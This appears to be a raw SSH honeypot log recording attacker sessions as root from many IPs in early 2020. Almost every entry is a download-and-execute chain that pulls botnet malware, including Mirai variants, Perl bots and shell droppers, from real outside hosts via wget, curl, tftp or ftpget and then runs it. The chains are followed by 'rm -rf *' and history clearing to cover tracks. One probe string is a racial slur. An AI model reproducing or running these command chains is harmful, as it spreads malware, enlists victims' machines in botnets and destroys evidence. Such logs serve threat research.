wget -q http://45.148.10.95/kuma-ssh-update.sh
curl -O http://45.148.10.95/kuma-ssh-update.sh
chmod 777 kuma-ssh-update.sh
sh kuma-ssh-update.sh
tftp 45.148.10.95 -c get kuma-ssh-update.sh
chmod 777 kuma-ssh-update.sh
sh kuma-ssh-update.sh
tftp -r kuma-ssh-update2.sh -g 45.148.10.95
chmod 777 kuma-ssh-update2.sh
sh kuma-ssh-update2.sh
ftpget -v -u anonymous -p anonymous -P 21 45.148.10.95 kuma-ssh-update1.sh kuma-ssh-update1.sh
sh kuma-ssh-update1.sh
rm -rf kuma-ssh-update.sh kuma-ssh-update.sh kuma-ssh-update2.sh kuma-ssh-update1.sh
rm -rf *
history -c

From 64.227.37.126 21-Feb-2020 13:31:34 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://68.183.44.22/mixbins.sh; chmod 777 mixbins.sh; sh mixbins.sh; tftp 68.183.44.22 -c get mixtftp1.sh; chmod 777 mixtftp1.sh; sh mixtftp1.sh; tftp -r mixtftp2.sh -g 68.183.44.22; chmod 777 mixtftp2.sh; sh mixtftp2.sh; rm -rf mixbins.sh mixtftp1.sh mixtftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://68.183.44.22/mixbins.sh
chmod 777 mixbins.sh
sh mixbins.sh
tftp 68.183.44.22 -c get mixtftp1.sh
chmod 777 mixtftp1.sh
sh mixtftp1.sh
tftp -r mixtftp2.sh -g 68.183.44.22
chmod 777 mixtftp2.sh
sh mixtftp2.sh
rm -rf mixbins.sh mixtftp1.sh mixtftp2.sh
rm -rf *

From 159.203.64.91 22-Feb-2020 13:01:46 ssh2 root
Exec cd /tmp; wget http://45.148.10.86/dafuqman111/gh0st0a1s0as2d12.x86; curl -O http://45.148.10.86/dafuqman111/gh0st0a1s0as2d12.x86; cat gh0st0a1s0as2d12.x86 > ssh-asdsadaupdater; chmod +x *; ./ssh-asdsadaupdater rooted
cd /tmp
wget http://45.148.10.86/dafuqman111/gh0st0a1s0as2d12.x86
curl -O http://45.148.10.86/dafuqman111/gh0st0a1s0as2d12.x86
cat gh0st0a1s0as2d12.x86 > ssh-asdsadaupdater
chmod +x *
./ssh-asdsadaupdater rooted

From 193.214.67.142 24-Feb-2020 16:57:46 ssh2 root
Exec echo "cd /tmp; wget http://46.246.41.25/wget.sh || curl http://46.246.41.25/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh
echo "cd /tmp
wget http://46.246.41.25/wget.sh || curl http://46.246.41.25/curl.sh -o curl.sh
chmod +x *.sh
./wget.sh
./curl.sh" | sh

From 94.23.203.37 24-Feb-2020 20:01:39 ssh2 root
Exec uname -snrvo; uptime -p
uname -snrvo
uptime -p

From 82.205.2.123 27-Feb-2020 23:30:53 ssh2 root
Exec 

From 82.205.2.123 27-Feb-2020 23:31:32 ssh2 root
Exec 
free -m

From 82.205.2.123 27-Feb-2020 23:31:43 ssh2 root
Exec 
ls

From 46.101.184.111 29-Feb-2020 19:41:38 ssh2 root
Exec cd /tmp; wget http://45.148.10.86/as12a0s/z2s234.x86; cat z2s234.x86 > ssh-updater; chmod +x *; ./ssh-updater rooted
cd /tmp
wget http://45.148.10.86/as12a0s/z2s234.x86
cat z2s234.x86 > ssh-updater
chmod +x *
./ssh-updater rooted

From 83.209.173.60 1-Mar-2020 14:52:20 ssh2 root
Exec /bin/sh NIGGA || /bin/busybox NIGGA
/bin/sh NIGGA || /bin/busybox NIGGA

From 83.209.173.60 2-Mar-2020 07:08:59 ssh2 root
Exec echo "cat /proc/1/mountinfo" | sh
echo "cat /proc/1/mountinfo" | sh

From 41.234.66.22 3-Mar-2020 08:13:41 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.114.82.179/snype.sh; chmod 777 snype.sh; sh snype.sh; tftp 93.114.82.179 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 93.114.82.179; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://93.114.82.179/snype.sh
chmod 777 snype.sh
sh snype.sh
tftp 93.114.82.179 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 93.114.82.179
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 188.166.163.246 4-Mar-2020 19:23:36 ssh2 root
Exec cd /tmp; wget http://45.148.10.86/dafuqman111/gh0st0a1s0as2d12.x86; cat gh0st0a1s0as2d12.x86 > ssh-asdsadaupdater; chmod +x *; ./ssh-asdsadaupdater rooted
cd /tmp
wget http://45.148.10.86/dafuqman111/gh0st0a1s0as2d12.x86
cat gh0st0a1s0as2d12.x86 > ssh-asdsadaupdater
chmod +x *
./ssh-asdsadaupdater rooted

From 91.250.242.12 4-Mar-2020 20:03:49 ssh2 root
Exec ls /dev/udp
ls /dev/udp

From 45.148.10.175 5-Mar-2020 17:13:46 ssh2 root
Exec cd /tmp; wget http://45.148.10.86/as12a0s/z2s234.x86; cat z2s234.x86 > ssh-updater; chmod +x *; ./ssh-updater servers
cd /tmp
wget http://45.148.10.86/as12a0s/z2s234.x86
cat z2s234.x86 > ssh-updater
chmod +x *
./ssh-updater servers

From 223.83.254.246 6-Mar-2020 08:04:22 ssh2 root
wget http://119.3.124.143:8080/.32
chmod +x .32
./.32

From 41.234.66.22 8-Mar-2020 13:02:07 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.114.82.179/SnOoPy.sh; chmod 777 *; sh SnOoPy.sh; tftp -g 93.114.82.179 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://93.114.82.179/SnOoPy.sh
chmod 777 *
sh SnOoPy.sh
tftp -g 93.114.82.179 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 41.234.66.22 9-Mar-2020 11:52:26 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 35.243.252.51/boty.pl ; perl boty.pl ; rm -rf bot* ; history -c
cat /etc/issue
cd /tmp
wget 35.243.252.51/boty.pl
perl boty.pl
rm -rf bot*
history -c

From 157.230.123.253 14-Mar-2020 01:46:34 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.148.10.95/dlrdlrdlrdlr00001/d4mnasdasd4mn.x86; cat d4mnasdasd4mn.x86 > 0s234154y5dthge4; chmod +x *; ./0s234154y5dthge4 NEWROOTS; rm -rf *; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://45.148.10.95/dlrdlrdlrdlr00001/d4mnasdasd4mn.x86
cat d4mnasdasd4mn.x86 > 0s234154y5dthge4
chmod +x *
./0s234154y5dthge4 NEWROOTS
rm -rf *
history -c

From 125.111.13.204 14-Mar-2020 16:15:57 ssh2 root
Exec echo "cd /tmp; wget http://46.246.63.195/wget.sh || curl http://46.246.63.195/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh
echo "cd /tmp
wget http://46.246.63.195/wget.sh || curl http://46.246.63.195/curl.sh -o curl.sh
chmod +x *.sh
./wget.sh
./curl.sh" | sh

From 167.172.138.77 15-Mar-2020 21:27:27 ssh2 root
Exec cd /dev/shm ; curl -O https://like-configurations.000webhostapp.com/.info ; chmod +x .info ; ./.info ; rm -rf .info ; cd ; rm -rf .bash_history ; history -c
cd /dev/shm
curl -O https://like-configurations.000webhostapp.com/.info
chmod +x .info
./.info
rm -rf .info
cd
rm -rf .bash_history
history -c

From 41.234.66.22 18-Mar-2020 16:45:24 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 34.68.115.66/boty.pl ; perl boty.pl ; rm -rf bot* ; history -c
cat /etc/issue
cd /tmp
wget 34.68.115.66/boty.pl
perl boty.pl
rm -rf bot*
history -c

From 167.71.57.61 19-Mar-2020 06:33:58 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.148.10.95/dlrdlrdlrdlr00001/d4mnasdasd4mn.x86; cat d4mnasdasd4mn.x86 > 0q22315dqsd; chmod +x *; ./0q22315dqsd NEWROOTS; rm -rf *; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://45.148.10.95/dlrdlrdlrdlr00001/d4mnasdasd4mn.x86
cat d4mnasdasd4mn.x86 > 0q22315dqsd
chmod +x *
./0q22315dqsd NEWROOTS
rm -rf *
history -c

From 41.234.66.22 20-Mar-2020 23:01:15 ssh2 root
Exec cat /etc/issue ; cd /tmp ; rm -rf x86 ; wget 34.68.115.66/x86 ; chmod 777 x86 ; ./x86 ; rm -rf x86 ; history -c
cat /etc/issue
cd /tmp
rm -rf x86
wget 34.68.115.66/x86
chmod 777 x86
./x86
rm -rf x86
history -c

From 41.234.66.22 22-Mar-2020 10:11:37 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /run || cd /; wget http://93.114.82.176/botnetbins.sh; chmod 777 botnetbins.sh; sh botnetbins.sh; tftp 93.114.82.176 -c get botnettftp1.sh; chmod 777 botnettftp1.sh; sh botnettftp1.sh; tftp -r botnettftp2.sh -g 93.114.82.176; chmod 777 botnettftp2.sh; sh botnettftp2.sh; rm -rf botnetbins.sh botnettftp1.sh botnettftp2.sh; rm -rf * ; history -c
cat /etc/issue
cd /tmp || cd /run || cd /
wget http://93.114.82.176/botnetbins.sh
chmod 777 botnetbins.sh
sh botnetbins.sh
tftp 93.114.82.176 -c get botnettftp1.sh
chmod 777 botnettftp1.sh
sh botnettftp1.sh
tftp -r botnettftp2.sh -g 93.114.82.176
chmod 777 botnettftp2.sh
sh botnettftp2.sh
rm -rf botnetbins.sh botnettftp1.sh botnettftp2.sh
rm -rf *
history -c

From 41.234.66.22 23-Mar-2020 06:49:36 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /run || cd /; wget http://93.114.82.176/MiraiVariant.x86 ; chmod 777 MiraiVariant.x86 ; ./MiraiVariant.x86 ; rm -rf Mirai* ; history -c
cat /etc/issue
cd /tmp || cd /run || cd /
wget http://93.114.82.176/MiraiVariant.x86
chmod 777 MiraiVariant.x86
./MiraiVariant.x86
rm -rf Mirai*
history -c

From 41.234.66.22 24-Mar-2020 08:56:24 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 93.114.82.176/Pandoras_Box/pandora.x86 ; chmod 777 pandora.x86 ; ./pandora.x86 ; rm -rf pandora* ; history -c
cat /etc/issue
cd /tmp
wget 93.114.82.176/Pandoras_Box/pandora.x86
chmod 777 pandora.x86
./pandora.x86
rm -rf pandora*
history -c

From 207.180.227.177 27-Mar-2020 23:49:02 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 185.164.72.248/x86 ; chmod 777 x86 ; ./x86 ; rm -rf x86 ; history -c
cat /etc/issue
cd /tmp
wget 185.164.72.248/x86
chmod 777 x86
./x86
rm -rf x86
history -c

From 106.54.16.240 28-Mar-2020 00:51:25 ssh2 root
Exec wget nasapaul.com/v.py && python2 v.py
wget nasapaul.com/v.py
python2 v.py

From 45.95.168.245 28-Mar-2020 02:25:25 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.242/dlrdlrdlrdlr00001/d4mnasdasd4mn.x86; cat d4mnasdasd4mn.x86 > 0q22315dqsd; chmod +x *; ./0q22315dqsd COVID19; rm -rf *; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://45.95.168.242/dlrdlrdlrdlr00001/d4mnasdasd4mn.x86
cat d4mnasdasd4mn.x86 > 0q22315dqsd
chmod +x *
./0q22315dqsd COVID19
rm -rf *
history -c

From 41.234.66.22 28-Mar-2020 13:02:50 ssh2 root
Exec cat /etc/issue ; cd /tmp ; rm -rf x86 ; wget 93.114.82.176/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c
cat /etc/issue
cd /tmp
rm -rf x86
wget 93.114.82.176/bot.pl
perl bot.pl
rm -rf bot*
history -c

From 41.234.66.22 29-Mar-2020 23:14:38 ssh2 root
Exec cat /etc/issue ; cd /tmp ; rm -rf bot.pl ; wget 93.114.82.155/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c
cat /etc/issue
cd /tmp
rm -rf bot.pl
wget 93.114.82.155/bot.pl
perl bot.pl
rm -rf bot*
history -c

From 45.95.168.247 30-Mar-2020 16:16:06 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.246/upperdater.sh; cat upperdater.sh > newssh10243121; chmod +x newssh10243121; sh newssh10243121; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://45.95.168.246/upperdater.sh
cat upperdater.sh > newssh10243121
chmod +x newssh10243121
sh newssh10243121
history -c

From 195.154.164.235 30-Mar-2020 22:21:32 ssh2 root
Exec cd /dev/shm ; curl -O sticfi.000webhostapp.com/abc ; chmod +x abc ; ./abc ; rm -rf abc ; cd ; rm -rf .bash_history ; history -c
cd /dev/shm
curl -O sticfi.000webhostapp.com/abc
chmod +x abc
./abc
rm -rf abc
cd
rm -rf .bash_history
history -c

From 142.4.212.119 31-Mar-2020 07:06:01 ssh2 root
Exec cat /proc/version
cat /proc/version

From 213.202.233.221 31-Mar-2020 14:46:42 ssh2 root
Exec uname -a nproc
uname -a nproc

From 45.95.168.245 1-Apr-2020 06:07:45 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.242/dlrdlrdlrdlr00001/d4mnasdasd4mn.x86; cat d4mnasdasd4mn.x86 > 0s234154y5dthge4; chmod +x *; ./0s234154y5dthge4 COVID19; rm -rf *; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://45.95.168.242/dlrdlrdlrdlr00001/d4mnasdasd4mn.x86
cat d4mnasdasd4mn.x86 > 0s234154y5dthge4
chmod +x *
./0s234154y5dthge4 COVID19
rm -rf *
history -c

From 109.96.110.180 3-Apr-2020 13:47:08 ssh2 root
ls
free -mt
passwd
wget nasapaul.com/ninfo
ls
perl test.pl
yum install perl
apt-get install perl
perl test.pl
ls
wget
ls
yum install passwd
apt-get install passwd
passwd
sudo su
perl
python
cat /proc/cpuinfo
password

From 109.96.110.180 3-Apr-2020 14:07:37 ssh2 root
ls
w
free- mt
free -mt
wget
wget nasapaul.com/v.py

From 3.93.78.191 3-Apr-2020 14:10:19 ssh2 root
Exec uname -a ; lscpu
uname -a
lscpu
free -mt
cat /proc/cpuinfo

From 3.93.78.191 3-Apr-2020 14:11:06 ssh2 root
Exec uname -a ; lscpu
uname -a
lscpu
wget arhivead1tz.tk/scan.zip
wget arhivead1tz.tk/scan.zip
w

From 45.95.168.243 4-Apr-2020 02:03:26 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.95.168.243/snype.sh; chmod 777 snype.sh; sh snype.sh; tftp 45.95.168.243 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.95.168.243; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.95.168.243/snype.sh
chmod 777 snype.sh
sh snype.sh
tftp 45.95.168.243 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 45.95.168.243
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 112.196.68.117 4-Apr-2020 06:15:39 ssh2 root
Exec cat /proc/*/mounts
cat /proc/*/mounts

From 159.203.90.161 4-Apr-2020 17:30:32 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /tmp;/dev/shm;cd /var/tmp;rm -rf kik.pl;wget -q 128.199.224.178/wp-admin/images/kik.pl || curl -s -O -f 128.199.224.178/wp-admin/images/kik.pl;perl kik.pl;rm -rf kik.*
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd /tmp
/dev/shm
cd /var/tmp
rm -rf kik.pl
wget -q 128.199.224.178/wp-admin/images/kik.pl || curl -s -O -f 128.199.224.178/wp-admin/images/kik.pl
perl kik.pl
rm -rf kik.*

From 84.88.40.36 5-Apr-2020 18:45:46 ssh2 root
Exec cat /etc/issue ; cd /tmp ; rm -rf bot.pl ; wget 51.38.244.192/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c
cat /etc/issue
cd /tmp
rm -rf bot.pl
wget 51.38.244.192/bot.pl
perl bot.pl
rm -rf bot*
history -c

From 45.95.168.251 6-Apr-2020 15:53:17 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.250/0203333/k0zk0z.x86; cat k0zk0z.x86 > 0cx1c12; chmod +x 0cx1c12; ./0cx1c12 ROOTED; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://45.95.168.250/0203333/k0zk0z.x86
cat k0zk0z.x86 > 0cx1c12
chmod +x 0cx1c12
./0cx1c12 ROOTED
history -c

From 51.89.224.140 6-Apr-2020 21:23:52 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 188.212.100.2/x86 ; chmod 777 x86 ; ./x86 ; ; rm -rf x86 ; history -c ; wget 188.212.100.2/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 188.212.100.2/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; echo nitemaxwashere > nitemaxwashere
cat /etc/issue
cd /tmp
wget 188.212.100.2/x86
chmod 777 x86
./x86
rm -rf x86
history -c
wget 188.212.100.2/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 188.212.100.2/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
echo nitemaxwashere > nitemaxwashere

From 45.95.168.248 6-Apr-2020 23:45:47 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.246/xz888000/a7mad.x86; cat a7mad.x86 > newssh10243121; chmod +x newssh10243121; ./newssh10243121 ROOTED; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://45.95.168.246/xz888000/a7mad.x86
cat a7mad.x86 > newssh10243121
chmod +x newssh10243121
./newssh10243121 ROOTED
history -c

From 195.231.8.111 7-Apr-2020 00:10:29 ssh2 root
Exec wget http://107.173.251.124/x86; chmod 777 x86; ./x86 ROOTS
wget http://107.173.251.124/x86
chmod 777 x86
./x86 ROOTS

From 104.41.153.74 7-Apr-2020 21:42:01 ssh2 root
Exec cat /etc/issue ; payload
cat /etc/issue
payload
Exec cat /etc/issue ; payload
cat /etc/issue
payload

From 51.91.140.218 8-Apr-2020 08:30:18 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 188.212.100.2/x86 ; chmod 777 x86 ; ./x86 ; history -c ; wget 188.212.100.2/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 188.212.100.2/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; echo nitemaxwashere > nitemaxwashere
cat /etc/issue
cd /tmp
wget 188.212.100.2/x86
chmod 777 x86
./x86
history -c
wget 188.212.100.2/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 188.212.100.2/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
echo nitemaxwashere > nitemaxwashere

From 51.91.140.218 8-Apr-2020 19:11:47 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://188.212.100.2/Pandora.sh; curl -O http://188.212.100.2/Pandora.sh; chmod 777 Pandora.sh; sh Pandora.sh; tftp 188.212.100.2 -c get Pandora.sh; chmod 777 Pandora.sh; sh Pandora.sh; tftp -r Pandora2.sh -g 188.212.100.2; chmod 777 Pandora2.sh; sh Pandora2.sh; ftpget -v -u anonymous -p anonymous -P 21 188.212.100.2 Pandora1.sh Pandora1.sh; sh Pandora1.sh; rm -rf Pandora.sh Pandora.sh Pandora2.sh Pandora1.sh; rm -rf * ; echo nite a fost aici sclaviloooooor <3 vpsu a fost urcat pe botnetul meu :( - Much Love BaBy > nitemaxwashere ; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://188.212.100.2/Pandora.sh
curl -O http://188.212.100.2/Pandora.sh
chmod 777 Pandora.sh
sh Pandora.sh
tftp 188.212.100.2 -c get Pandora.sh
chmod 777 Pandora.sh
sh Pandora.sh
tftp -r Pandora2.sh -g 188.212.100.2
chmod 777 Pandora2.sh
sh Pandora2.sh
ftpget -v -u anonymous -p anonymous -P 21 188.212.100.2 Pandora1.sh Pandora1.sh
sh Pandora1.sh
rm -rf Pandora.sh Pandora.sh Pandora2.sh Pandora1.sh
rm -rf *
echo nite a fost aici sclaviloooooor <3 vpsu a fost urcat pe botnetul meu :( - Much Love BaBy > nitemaxwashere
history -c

From 194.180.224.150 9-Apr-2020 00:09:13 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.124/drvbot.sh; curl -O http://194.180.224.124/drvbot.sh; chmod 777 drvbot.sh; sh drvbot.sh; tftp 194.180.224.124 -c get drvbot.sh; chmod 777 drvbot.sh; sh drvbot.sh; tftp -r drvbot2.sh -g 194.180.224.124; chmod 777 drvbot2.sh; sh drvbot2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.180.224.124 drvbot1.sh drvbot1.sh; sh drvbot1.sh; rm -rf drvbot.sh drvbot.sh drvbot2.sh drvbot1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://194.180.224.124/drvbot.sh
curl -O http://194.180.224.124/drvbot.sh
chmod 777 drvbot.sh
sh drvbot.sh
tftp 194.180.224.124 -c get drvbot.sh
chmod 777 drvbot.sh
sh drvbot.sh
tftp -r drvbot2.sh -g 194.180.224.124
chmod 777 drvbot2.sh
sh drvbot2.sh
ftpget -v -u anonymous -p anonymous -P 21 194.180.224.124 drvbot1.sh drvbot1.sh
sh drvbot1.sh
rm -rf drvbot.sh drvbot.sh drvbot2.sh drvbot1.sh
rm -rf *

From 45.95.168.248 9-Apr-2020 09:43:35 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.246/xz888000/a7mad.x86; cat a7mad.x86 > newssh10243121; chmod +x newssh10243121; ./newssh10243121 ROOTED2; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://45.95.168.246/xz888000/a7mad.x86
cat a7mad.x86 > newssh10243121
chmod +x newssh10243121
./newssh10243121 ROOTED2
history -c

From 51.91.140.218 10-Apr-2020 00:25:36 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://188.212.100.2/sensi.sh; curl -O http://188.212.100.2/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 188.212.100.2 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 188.212.100.2; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 188.212.100.2 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://188.212.100.2/sensi.sh
curl -O http://188.212.100.2/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 188.212.100.2 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 188.212.100.2
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 188.212.100.2 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *

From 195.231.3.230 10-Apr-2020 22:52:47 ssh2 root
Exec wget http://192.3.193.251/x86; chmod 777 x86; ./x86 ROOTS
wget http://192.3.193.251/x86
chmod 777 x86
./x86 ROOTS

From 46.97.168.84 12-Apr-2020 04:08:42 ssh2 root
w
cat /proc/cpuinfo
cat /proc/cpuinfo
ls -a
cd
cat /etc/issue
cd .ssh
ls -a
cd .ssh
ls -a
cat reglas.pl
lastlog
wget
cd /tmp
ks -a
ls -a
pwd
dir

From 46.97.168.84 12-Apr-2020 04:20:30 ssh2 root
useradd john
adduser john

From 134.209.92.110 12-Apr-2020 06:14:16 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.39.185.214/bins/x86; curl -O http://193.39.185.214/bins/x86; cat x86 > gucci; chmod +x *; ./gucci ssh.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://193.39.185.214/bins/x86
curl -O http://193.39.185.214/bins/x86
cat x86 > gucci
chmod +x *
./gucci ssh.exploit

From 155.138.220.148 12-Apr-2020 14:23:33 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://140.82.8.73/Beastmode.sh; curl -O http://140.82.8.73/Beastmode.sh; chmod 777 Beastmode.sh; sh Beastmode.sh; tftp 140.82.8.73 -c get Beastmode.sh; chmod 777 Beastmode.sh; sh Beastmode.sh; tftp -r Beastmode2.sh -g 140.82.8.73; chmod 777 Beastmode2.sh; sh Beastmode2.sh; ftpget -v -u anonymous -p anonymous -P 21 140.82.8.73 Beastmode1.sh Beastmode1.sh; sh Beastmode1.sh; rm -rf Beastmode.sh Beastmode.sh Beastmode2.sh Beastmode1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://140.82.8.73/Beastmode.sh
curl -O http://140.82.8.73/Beastmode.sh
chmod 777 Beastmode.sh
sh Beastmode.sh
tftp 140.82.8.73 -c get Beastmode.sh
chmod 777 Beastmode.sh
sh Beastmode.sh
tftp -r Beastmode2.sh -g 140.82.8.73
chmod 777 Beastmode2.sh
sh Beastmode2.sh
ftpget -v -u anonymous -p anonymous -P 21 140.82.8.73 Beastmode1.sh Beastmode1.sh
sh Beastmode1.sh
rm -rf Beastmode.sh Beastmode.sh Beastmode2.sh Beastmode1.sh
rm -rf *

From 104.244.73.16 13-Apr-2020 15:33:34 ssh2 root
Exec cd /tmp; wget http://ionage.theworkpc.com:8088/sshd.sh; curl -O http://ionage.theworkpc.com:8088/sshd.sh; sh sshd.sh; rm -rf sshd.sh
cd /tmp
wget http://ionage.theworkpc.com:8088/sshd.sh
curl -O http://ionage.theworkpc.com:8088/sshd.sh
sh sshd.sh
rm -rf sshd.sh

From 62.171.142.113 13-Apr-2020 16:24:27 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://140.82.8.73/update.sh; curl -O http://140.82.8.73/update.sh; chmod 777 update.sh; sh update.sh; tftp 140.82.8.73 -c get update.sh; chmod 777 update.sh; sh update.sh; tftp -r update2.sh -g 140.82.8.73; chmod 777 update2.sh; sh update2.sh; ftpget -v -u anonymous -p anonymous -P 21 140.82.8.73 update1.sh update1.sh; sh update1.sh; rm -rf update.sh update.sh update2.sh update1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://140.82.8.73/update.sh
curl -O http://140.82.8.73/update.sh
chmod 777 update.sh
sh update.sh
tftp 140.82.8.73 -c get update.sh
chmod 777 update.sh
sh update.sh
tftp -r update2.sh -g 140.82.8.73
chmod 777 update2.sh
sh update2.sh
ftpget -v -u anonymous -p anonymous -P 21 140.82.8.73 update1.sh update1.sh
sh update1.sh
rm -rf update.sh update.sh update2.sh update1.sh
rm -rf *

From 178.128.211.250 13-Apr-2020 16:50:06 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.242/x05010/888fff999.x86; cat 888fff999.x86 > 12q1q3dfggf; chmod +x 12q1q3dfggf; ./12q1q3dfggf COVID20; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://45.95.168.242/x05010/888fff999.x86
cat 888fff999.x86 > 12q1q3dfggf
chmod +x 12q1q3dfggf
./12q1q3dfggf COVID20
history -c

From 134.122.127.161 14-Apr-2020 11:42:06 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.242/x05010/888fff999.x86; cat 888fff999.x86 > 12q1q3dfggf; chmod +x 12q1q3dfggf; ./12q1q3dfggf UnstableZombieArmy01; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://45.95.168.242/x05010/888fff999.x86
cat 888fff999.x86 > 12q1q3dfggf
chmod +x 12q1q3dfggf
./12q1q3dfggf UnstableZombieArmy01
history -c

From 51.91.140.218 14-Apr-2020 15:00:56 ssh2 root
Exec cat /etc/issue ; cd /tmp ;  rm -rf bot* ; wget 41.110.24.29/bot.pl ; perl bot.pl ; rm -rf bot* ; curl -O 41.110.24.29/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c
cat /etc/issue
cd /tmp
rm -rf bot*
